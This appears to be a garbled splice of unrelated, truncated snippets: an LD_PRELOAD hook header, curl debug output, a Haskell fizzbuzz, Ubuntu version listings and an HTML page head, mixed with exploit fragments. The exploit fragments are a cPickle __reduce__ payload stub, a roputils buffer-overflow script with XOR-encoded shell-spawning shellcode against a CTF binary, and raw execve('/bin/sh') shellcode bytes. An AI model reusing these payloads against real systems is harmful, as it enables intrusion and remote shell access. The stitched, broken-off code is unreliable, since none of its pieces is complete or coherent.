/*
compile:
$ gcc -shared -fPIC -o hook.so hook.c -ldl
*/
#define _GNU_SOURCE
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>

$ curl -v -L -A "Mozilla/5.0" http://www.unoh.net/
* STATE: INIT => CONNECT handle 0x60002d130; line 998 (connection #-5000)
* About to connect() to www.unoh.net port 80 (#0)
* Trying 109.201.133.191...
* Adding handle: conn: 0x600069370
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* 0x60002d130 is at send pipe head!
* - Conn 0 (0x600069370) send_pipe: 1, recv_pipe: 0

import cPickle
import subprocess
import base64
import socket
s = socket.create_connection(('localhost', 5000))
class Exploit(object):
    def __reduce__(self):
        fd = s.fileno()

import Control.Monad
main =
  forM_ [1..100] $ \x -> do
    if x `mod` 15 == 0 then
      putStrLn "fizzbuzz"
    else if x `mod` 5 == 0 then
      putStrLn "buzz"
    else if x `mod` 3 == 0 then
      putStrLn "fizz"

# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 12.04.5 LTS
Release: 12.04
Codename: precise
# /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu EGLIBC 2.15-0ubuntu10.6) stable release version 2.15, by Roland McGrath et al.
Copyright (C) 2012 Free Software Foundation, Inc.

$ uname -a
Linux vm-ubuntu32 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.1 LTS
Release: 14.04
Codename: trusty

from roputils import *
p = Proc('./oh_my_scanf')
#p = Proc(host='pwnable.katsudon.org', port=32100)
sc = Shellcode('i386')
buf = 'A' * 28
buf += p32(0x80483e0) # push esp; ret
buf += sc.xor(sc.exec_shell(), '\t\n\v\f\r ') # eliminate white-space characters for scanf("%s") attack

$ uname -a
Linux vm-ubuntu64 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.1 LTS
Release: 14.04
Codename: trusty

import struct
import socket
from telnetlib import Telnet
senryu1 = '\x8d\x48\x19\x31\xdb'
senryu2 = '\x6a\x7f\x5a\x6a\x03\x58\x90'
senryu3 = '\xcd\x80\xff\xe1\x90'
# execve("/bin/sh", {"/bin/sh", NULL}, NULL)
shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'

<!DOCTYPE html>
<html>
<meta charset="UTF-8">
<title>megrepper</title>
<body>
<canvas id="canvas"></canvas>
<div style="position: fixed; left: 160px; display: inline-block;">
<h1>megrepper</h1>
<pre id="edit" style="width: 40em; margin: 0; background-color: #eeeeee">Drag & drop a file on page</pre>
</div>